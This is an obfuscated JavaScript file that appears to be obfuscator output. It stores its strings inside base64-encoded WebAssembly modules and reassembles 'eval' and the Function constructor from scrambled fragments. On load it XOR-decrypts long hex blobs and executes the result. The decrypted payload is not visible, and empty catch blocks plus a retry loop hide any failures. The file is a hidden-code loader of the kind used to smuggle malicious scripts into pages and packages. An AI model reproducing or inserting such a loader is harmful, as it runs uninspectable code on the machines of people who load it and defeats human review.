const __universalAtob = function (b64Encoded) {
    try {
        let binary_string = atob(b64Encoded), len = binary_string.length, bytes = new Uint8Array(len);
        for (let i = 0; i < len; i++) {
            bytes[i] = binary_string.charCodeAt(i);
        }
        return bytes;
    } catch (err) {
        return new Uint8Array(global.Buffer.from(b64Encoded, 'base64'));
    }
};
const __callWasmBuffer = 'AGFzbQEAAAABhICAgAABYAAAAo+AgIAAAQNlbnYHaW1wRnVuYwAAA4KAgIAAAQAEhICAgAABcAAABYOAgIAAAQABB5GAgIAAAgZtZW1vcnkCAARkYXRhAAEKioCAgAABhICAgAAAEAAL';
const __callWasmModule = new WebAssembly.Module((() => {
    try {
        let binary_string = atob(__callWasmBuffer), len = binary_string.length, bytes = new Uint8Array(len);
        for (let i = 0; i < len; i++) {
            bytes[i] = binary_string.charCodeAt(i);
        }
        return bytes;
    } catch (err) {
        return new Uint8Array(global.Buffer.from(__callWasmBuffer, 'base64'));
    }
})());
const __wasmStringModules = [
    'AGFzbQEAAAAFg4CAgAABAAEG7ICAgAASfwBBAQt/AEHiAAt/AEHsAAt/AEGiAQt/AEGsAQt/AEHWAQt/AEHgAQt/AEGEAgt/AEGOAgt/AEGgAgt/AEH4BAt/AEHABQt/AEHOBQt/AEHYBQt/AEHiBQt/AEGeBgt/AEHADAt/AEHiEgsHooGAgAATBm1lbW9yeQIABWRhdGEwAwAFZGF0YTEDAQVkYXRhMgMCBWRhdGEzAwMFZGF0YTQDBAVkYXRhNQMFBWRhdGE2AwYFZGF0YTcDBwVkYXRhOAMIBWRhdGE5AwkGZGF0YTEwAwoGZGF0YTExAwsGZGF0YTEyAwwGZGF0YTEzAw0GZGF0YTE0Aw4GZGF0YTE1Aw8GZGF0YTE2AxAGZGF0YTE3AxEL25mAgAASAEEBC2B2YXIlMjBPT09PME9PJTNET09vTzBPTyglMjJlJTJCdiUyQmxhdmUlMkJsYSUyQmV2ZSUyQmFsJTIyKSUzQnJldHVybiUyMG8wMDBPTzAoT09PTzBPTyUyQzE4KSUzQgAAQeIACwhvb29vTzBvAABB7AALNXJldHVybiUyMG9vb29PMG8lNUInbWF0Y2gnJTVEKCUyRiU1Q1MlN0IxJTdEJTJGZyklM0IAAEGiAQsIb28wTzBPMAAAQawBCylyZXR1cm4lMjBTdHJpbmcuZnJvbUNoYXJDb2RlKG9vME8wTzApJTNCAABB1gELCE9PbzBPTzAAAEHgAQsjcmV0dXJuJTIwcGFyc2VJbnQoT09vME9PMCUyQzE2KSUzQgAAQYQCCwhPTzAwbzBPAABBjgILEXZhciUyME8wb08wMG8lM0QAAEGgAgvXAm5ldyUyMEFycmF5KDEyNyUyQzEwNCUyQzI1MSUyQzQ5JTJDMTkyJTJDMzQlMkMyMjElMkMxMzklMkMyMDUlMkM5NCUyQzQwJTJDOTklMkMxOTElMkMxNjklMkMyMDAlMkMxMjYpJTJDT28wME9vMCUzRE9PMDBvME8ubWF0Y2goJTJGJTVDUyU3QjIlN0QlMkZnKSUyQ09vb28wTzAlM0QlMjIlMjIlMkNvME8wT08wJTNEMCUzQmZvcih2YXIlMjBvME8wT08wJTNEMCUyQ28wME9vT08lM0QwJTNCbzBPME9PMCUzQ09vMDBPbzAubGVuZ3RoJTNCbzBPME9PMCUyQiUyQiUyQ28wME9vT08lMkIlMkIpJTdCaWYobzAwT29PTyUzRSUzRE8wb08wMG8ubGVuZ3RoKSU3Qm8wME9vT08lM0QwJTNCJTdET29vbzBPMCUyMAAAQfgEC0clM0RPMDBvT09PKG9vbzBPbzAoT28wME9vMCU1Qm8wTzBPTzAlNUQpJTVFTzBvTzAwbyU1Qm8wME9vT08lNUQpJTNCJTdEAABBwAULDShPb29vME8wKSUzQgAAQc4FCwhvT29vMDBPAABB2AULCE9PTzBvMDAAAEHiBQs7cmV0dXJuJTIwb09vbzAwTyU1Qk1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSpPT08wbzAwKSU1RCUzQgAAQZ4GC6EGMTkxZDk1NTJiNDRiYjJlNWVkMzk0ZDE3ZmJjOGJjMWYzOTFhOTQ1Yzk1NTBiMWEzYjgyYzQ0NGY5ZmNhYTkxMjEzMGE5YTUyYWIwYmE2ZmZiZjI3NTMxNWRlZGJlODA2MTIwNGIzNDViNDUyZmRiNmVkMzA0ZDE0OWZlOGFiMGExNjFlOWU2OThmNDBiN2VlYWUyYTAwNDFmMmZhOTAzMzMzNWFkNTY5OGQ2ZTk1ZGY5OTBlMGE0YTg0ZDFhNTEyMzcxYzhmNDFlZTRkYWRlZWEzNzYwYTI0ZmFmZGVhNTI1ZjFkODk1ZGVjMDJiYmVhYTEyZDRkNGE4NGQxYTUxMjM3MWM4ZjQxZWU1MWI4ZTVhOTc2MDE1OGQ2Y2ZlODU2MDcwNTk3NzliNDU2YWRhNWJlMmE0OTE3Y2FkYWU4NDM0MjQ4YzkwMWYwMGJmZGYwYmYzYjVjMTZjZGM3ZTgxZDFlMDQ5NzUzYTE0MWI2YTNiNTMzNDQyYmNiZGRiODUwMmQwZDg4NDFhZjRjYWVlZThmMzE0YzFhOTM4OWFlMWYxMzFiOWUxOGZiNWZiOGU3YmUzYjUzMTFkYWRkYmQwYzExNDg5ODUwYWM0ZWJmZWFhZTM1MDAwZGNhYzVhNDUyNWYxYzg5NDRhNTBiZTZmNmIwM2Q0OTE3ZGNjMWU4NTYxYTFhODk1ZWIyMGJhNmY5YTgyYTVkMTFkMTg5YWIxZjEzMDQ5OTUwYTM0OWY1ZTViODMyNDQ0ZjlmZGRiYTBiMWE0MWMwNGNiZDQ0YThlNWFlMmE0MTBjZDE4OWFmMWIwYjJjOWE0NWExMGFiZWVhYTEzMjRhMDJkY2MyZTEwNTBiMWE4MjRhYTc0N2E5Y2ZhYzJhNDkyNWNkYzZhNTJiMGQwNGQzMTNhODU2YTlmYmY3NzEwNzE0YzhkZWU2MTAxMDFmODg0NGFlNGNhNGVjYTY3MDVjMGNjZjg2YmQwZDFhMWFkNTQxYTg1MmUyZWRmMDZjMDYwNGQ2Y2ZlYTUyNWYwZThlNWZhMzU2YjRlNGEzNzY1YTA2Y2NkY2E0MGEAAEHADAuhBjUzNDg5ZTQzYjI0ZGFmYTJlZDI1NDEwNTlmODFlOTFiMGQxYTk0NDNlOTU5YWZlZWI5MmI1YTBkOWZjYWE5MTIxMzBhOWE1MmFiMGFhZmVlYmUyYjQ0MTc5Mzg5YWUxZjEzMWI5ZTE4ZmI1ZmI4ZTdiZTNiNTMwNGRhZGQ4YzFmMGIwOWJkNDNhZjRmODhmOWExNzYwYTBiY2JkZGI4NDQ1MDQ3OGM0NmI3MGNiM2U0YmEyZDVkMGRkMWQwYWYxNTUxMWM5NDQxZWY1N2FlZWViZjcwNTgwYmNmOTZhZTQzNGQ0NjljNThhNjAwZjFhYmFiMmI0NjAwY2JjMGE3MTA1NzFhOWU0MmI1NGVhOWE3ZWQzYjVhMTFkMGRiZTE1ZTA0MDE5ZDExZTgwM2I4ZjliZjMxNWE0YWM0ZGJhZDBhMGExYTk1MTFhMzQzYjFlN2FmM2Y0YjA4OTdkYmFkMGQwYTA0OGYxZGUwNDRiY2U3YmUzYjAxNThjMmNjYTQwZDFhMTM5YzU0YjQ2NmJjZmZhYzE4NWEwY2QyZmNiYTEyNTc0YTkzNDViNDUyZTdhNGUyMjk1ZjE0OTFjN2E3MDkwYzFkOTU1ZmI5NDViNmE1YjkzMTU4NGNjYWRhYWQwYzUxMTg5MzQxZmY0NGUwYjllMzM5NDEwNTlkODVlODE4MGEwNjk4NDVhOTRkYjNhM2JmM2I1YjE2ZDNkZGU0NWUxYTFhODk1ZWIyMGJmZGYwYTQzODA4NGI5ZWNjYmEwYzEwMWFkMjRhYjI0N2E5ZmViZjMwMDgwMGRlYzVhNDFjMWUwYjkwMTliMjQ3YWVmZWExMmEwNDQzZDljOGE0MGQxYTQxYzA0Y2E1NGVhZWVlYjYyYzRkMTdjYWRiYTY1ZTFjMDk5NzVkYTI0M2JlZTBlNTMwNWQwZmQzODVlODBhMGQxZDllMThmYjVmYTBhMmY2MjM1NTRhODRkNGI1NTc0NDE1OTg1MGI0NDFiNWFiZTUzYjVhMTFkMGRiZTEwNTBkMGQ4ZjQ0YjI0Y2ZkZThhYzMyNDQwMWRlY2FhMzU2AABB4hILoQYxMTFkOTc1ZGVjMDJhOWY5YjgzYjAxNThjMmQ0YWUwYjExMGI4ZjU4YWY0Y2ZkZWNhODJhN2MwNmQyZDk4ZTE3MTMwZGFiNTBiNDRhZjVhMmI2MmE1YTFhYzRkZmE5MGM1ZjBlODgxMWZkMDJiM2VlYmE3ZTY5MDBjYmMwYmUxYjI3Mjc5OTViYTU0MWE5YTNlZjBkNGIxMWQ2ZDliYzE3MTEwZmQ1NzdhOTRlYjhkOGI0MmQ1YzA2ZDJlNmFhMTQxYTBiOGYxM2U5MTlhYmVhYmY3ZTVjMGVjZmVmYTExMjFhMjY5YTVjYTUwMmUwYWJlZjAyNzQ0MTlmODJlODMzMWUxYzkzMWZiMjQzYjNlZmEyMzMwMDRhOTFkZGE3MmQwYjFhOTI1ZmE3MGFlZWJkZTQ3MDViMTZkZGRhYmMwYzU3NWFkNzExZjkwYmZkYTBlZDdjMDYwNmM3Y2NlYTQ1MDkwOTg5MTFiNDRmYWRjZGE0MzI0ZDMzZGVkZGEwNWU0MjQ4OWQ0MmVlNjViOGZmOWUyZTRkMDBkNmM4YTQzODEwMDQ5ZjU0YjIwYWVmYTJlZDc1MDgxN2QyZDk4ZTE3MTMwZGI1NTBhZDQ3ZTZmOWE4MmE1ZDExZDE4OWJjMTMwZjJlOTI1ZGE1NzJiY2ZmYTU2NTU1MDBkZWRkYWIxNjVmNDA5ZTQzYjI0ZGFmYTJiNjJjNGQxN2NhZGJhNjVlMTkwOTk3NDJhNTE5YTBmNmFiMmI0NjAwY2JjMGE3MTA1ZjFiOWE0N2E1NzZiMmRmYTgzMzU4NGJkYmM4YmMxZjUzNDg5ODUwYWM0ZWJmZWFhZTM1MDExOGNiZGJiMTA1MDkwOTg5MTFiMDQzYTllM2VkNjMwODA0ZGFkZDljMWIxMjE4YmQ1OGFjNDc4ZGVhYjkzNjAwNGE4NGMwYWU1ZTU3MTg5YTQ1YTgwYmE2ZmRhYzJjMDgwY2RkYzM5YjBhMGQwZDlhNWNlMDFmZmRlNWE4MjkwODIyZGNkZGExMDgxYTMwYjQ1M2FhNDdiZWZmZTU3YzY5MjdmMGVkOGE1MAA=',
    'AGFzbQEAAAAFg4CAgAABAAEGmICAgAAEfwBBAQt/AEGkBgt/AEHGDAt/AEHEDgsHqoCAgAAFBm1lbW9yeQIABWRhdGEwAwAFZGF0YTEDAQVkYXRhMgMCBWRhdGEzAwML446AgAAEAEEBC6EGMmMxYzg5NTRhMTRmZmZhMmY2MzE0YTA5ZWNkZGJhMWIxZTA1ZDU3ZWIwNDdiM2EzZTQ2NTQ3MDFkNWZhYmMwYzFhMDk5NjFmOTQ1YmFkZWVlZDYzMDg1Mjg0YzZhYTE0MmMxYzg5NTRhMTRmZjNkY2JmMzc1YzA2OTdjZGE5MGExZTQxYzA1ZWEyNDg4ZWZmYmYzYjQ5MGU5MWY5YTcwZDE2MWM5MjVlYWUwMmUwYWJmZDY1NDcwMWQ1ZmFiYzBjMWEwOTk2MWY5MzQzYWJlZTk5MzE2ZTBhZDNjY2UwMGUxZTFjOTMxZGUwMTBmNGIwYTIzYzQyMzBjYmRiYWQxZjEyNDZiODVkYWY1MWI4YTNlNDY1NWEwNmNiZGNiYTEwNWYwYjlhNWRhYzQwYmNlOGE2NzY1ODAyY2JjMWU0NWUxOTA5OTc0MmE1MGJlNmY2YTgzMjViMDY5ZmQyYmExYjBiMWQ4OTVmZTA0MWJjZTdhMTNjNDkwMGQ0ODFhNjBiMTMwNGQ3MTFiNDUwYThlZWU0NjU1NTFlZGNjOGJjMWQxNzQ4ZDM1NGIyNTBiMmY5ZTQyNTVhMDZjYmRjYmExMDVmMGI5YTVkYWM0MGJjZThhNjc2NDYxNmQzYzVlNDVlMGIxYThlNTRlOTE5YTBmNmFiMmI0NjAwY2JjMGE3MTA1ZjE4OWE1NWU4NGNmNGFiYjYyYzRkMTdjYWRiYTY1ZTExNDhjNzExZjExMmZkYjRlZDdjMTg0MTlmODJlODEwNWY1MmRiNWZmYjVmYmFlZWI5MWE0OTE3ZGU4MWFlMGIxMTBiOGY1OGFmNGNmZGEzYTkzZjVjMDI5Mzg5YWQwYzBkMDc4OTE4ZTA1OWI0ZWRlZDc2MDkwNmNkZGJhNzBjNTYxMzg4NTBiNjQ3ODllNDk5M2I0NTEzOTdjZGE5MGExZTQ0ZGI1N2I1NGNiZWZmYTQzMTQ2NDM5N2Q5YTkwYTE3NDRkYjU0YjI1MGIyZjllNDdlNTMwYWQ5ODllMDVmMWExYTg5NWViMjBiYTZmZmJmMjc1MzE1ZGVkYmU4MGEAAEGkBguhBjE2MDU5ZTExZmQwMmIzZWViYTdlNmMwMmNiY2NlMDEwMWExZmRiNzVhMTU2YjhhM2U0NzA0ZjA2Y2JmZGExMTMxYTQwZDIxMWViMDJlZmFiZTc3ZTFlNTM5ZjgzZTg0ZjRmNThjYjE4ZmI1NGJjZjllZDJjNWQwZGViYzBhNTFiNWY1NWRiNDFhMTQ2ZjVmZmE0MzM0ZDRkZDhjY2JjMzYxMDFkODk0MmU4MGJmNGFiZTY3ZTBhNTk5ZDg5ZTM1ZTBmMDk5ZjE5YjQ0YmIwZWVlMzM5NGQxN2YyYzBhNjBiMGIwZDg4MTllOTBiZTZmZGFjMmMwODE0Y2NjMWU4NDM1ZjA2OWU0NmUwNjNiZWZmYTQyODRkM2JmMGNiYTIxYjFjMWNkMzEzOTc3MWJlZjlhNDJlNWM0ZGVjYzFhZDEyMTM0YWQyMGFiNjQzYWZhYmJhMzc0NjM1ZGFkYmU4NDM1ZjFmODg1OWVlNzBiOGVjOWYzYjQ5MDc5NzhiODAzNTNhMzFhNDdkOGY2MTljYzc5MjEzNjkyMGY3ZTA4NjNiMjMzNGE4N2U4Njc2OGFjYTlmMWI3NDNmZjJjMGFiMGMxMDFiOTQ1N2I0N2U4MWRjYTQzMDRjMGNjOGRhZTgzMDJiMzRhNzcyYjU1MGFmZWVhMzJhN2UwNmNkZGFhMTExMTEzNGE3NzJiNTUwYWZlZWEzMmE3ZTA2Y2RkYWExMTExMTRhZDIwYWE5NDRmZGEzYmEzNzQ2MzVkYWRiZTYxNzExMGM5ZTQ5OGY0NGY1YTlmYjcwMGE0YTlmOTdmNTVlNGY0ODg3NGRlMDU1YjRlNTliM2I1YTRkZDZjN2FjMWIwNzI3OWQxOWUyMTNlZGE1ZWY3NzA4NWQ4Mjg5Zjg1NzA0MWY4ODU5ZWU3MGE4ZTVlNTdjNWIwMGQ3ZGRhOTBkMTQxYmRiMWVhMzUwYjhlYWI5M2IwODRjY2JjN2U4NWM1ZjQzZGI3Y2ExNTZiNWE1YmYzZjQ2MDdkMGM0ZTA1NzUxMWM5NDYyYjQ1MGI0ZTVhYTc2MWI1NTk2ODdiYjBiAABBxgwL/QExZDFiOGY0M2U4MTBmMWFiZjQ3NzA4NDg5ZjhiZTg1MTBjMGJkYjVlYWU0MWI4YWJlMjJhNWE0MzlkODllMzVlMGYwOThmNTllMDA5ZmRhOWVkNzE1YjE3OWY4YmU4NTU1ZjFhOGU1Zjk0NGJiMGVlZTQ2NTU1MDZkM2RhYWQwNTA4MWI5MzFmOTI1N2IzYTNlZjNkNDUwNzkxY2NiMDFiNWY0Nzk4MTFiMzU2YmNmOWI5N2UwYTQzOTQ4OWI4MWYwYjAwZDIwYWJkNWZiZWVhYjkzZDQwNDM5N2NjYmEwYzEwMWFkMjExYmI1ZmEwZjZlNDY1NTUxZTk2OTIAAEHEDgsJRnVuY3Rpb24A'
].map(__bytes => {
    const bytesToUse = __universalAtob(__bytes);
    return new WebAssembly.Instance(new WebAssembly.Module(bytesToUse));
});
const lS = (wI, pos, iWC) => {
    let __str = '';
    if (!Array.isArray(wI)) {
        let __targetModule = __wasmStringModules[wI];
        let __mem = new Uint8Array(__targetModule.exports.memory.buffer);
        const __stringKey = `data${ pos }`;
        let __start = __targetModule.exports[__stringKey] - 1;
        let __str = '';
        let i = __start;
        let __c = __mem[i++];
        while (!(parseInt(__c) & 128) && __mem[i]) {
            __str += __c;
            __c = String.fromCharCode(__mem[i++]);
        }
        __str += __c;
        __str = decodeURIComponent(__str.substring(1));
        return __str;
    } else {
        for (const __wasmIndex of wI) {
            let __targetModule = __wasmStringModules[__wasmIndex];
            let __mem = new Uint8Array(__targetModule.exports.memory.buffer);
            const __stringKey = `data${ pos }`;
            let __start = __targetModule.exports[__stringKey] - 1;
            let i = __start;
            let __c = __mem[i++];
            while (!(parseInt(__c) & 128) && __mem[i]) {
                __str += __c;
                __c = String.fromCharCode(__mem[i++]);
            }
            __str += __c;
        }
        __str = decodeURIComponent(__str.substring(1));
        return __str;
    }
};
function o00O00o() {
    var oOOoo00;
    try {
        oOOoo00 = new window[(lS(1, 3, true))](lS(0, 0))();
    } catch (er) {
    }
    return oOOoo00;
}
function OOoO0OO(OOooO00) {
    var OoO0oOO;
    try {
        OoO0oOO = new window[(lS(1, 3, true))](lS(0, 1), lS(0, 2))(OOooO00);
    } catch (er) {
    }
    return OoO0oOO;
}
function O00oOOO(OO0OoOO) {
    var OOO00oo;
    try {
        OOO00oo = new window[(lS(1, 3, true))](lS(0, 3), lS(0, 4))(OO0OoOO);
    } catch (er) {
    }
    return OOO00oo;
}
function ooo0Oo0(OOOOoOo) {
    var OooOOOO;
    try {
        OooOOOO = new window[(lS(1, 3, true))](lS(0, 5), lS(0, 6))(OOOOoOo);
    } catch (er) {
    }
    return OooOOOO;
}
function O0oOo0O(OOO00Oo) {
    var Oo0o0OO;
    while (true) {
        try {
            var i = 0;
            Oo0o0OO = new window[(lS(1, 3, true))](lS(0, 7), lS(0, 8) + lS(0, 9) + o00O00o() + lS(0, 10) + o00O00o() + o00O00o() + o00O00o() + o00O00o() + lS(0, 11))(OOO00Oo);
            break;
        } catch (er) {
        }
    }
    return Oo0o0OO;
}
function o000OO0(ooooOO0, oo0Oo0o) {
    var o0oo0Oo;
    try {
        o0oo0Oo = new window[(lS(1, 3, true))](lS(0, 12), lS(0, 13), lS(0, 14))(ooooOO0, oo0Oo0o);
    } catch (er) {
    }
    return o0oo0Oo;
}
function OOO0oOo() {
    var OO0o0o0 = lS(0, 15) + lS(0, 16) + lS(0, 17) + lS(1, 0) + lS(1, 1) + lS(1, 2);
    return OO0o0o0;
}
(() => {
    const __callInstance0 = new WebAssembly.Instance(__callWasmModule, {
        env: {
            impFunc: () => {
                O0oOo0O(OOO0oOo());
            }
        }
    });
    const __exports = __callInstance0.exports;
    return __exports.data();
})();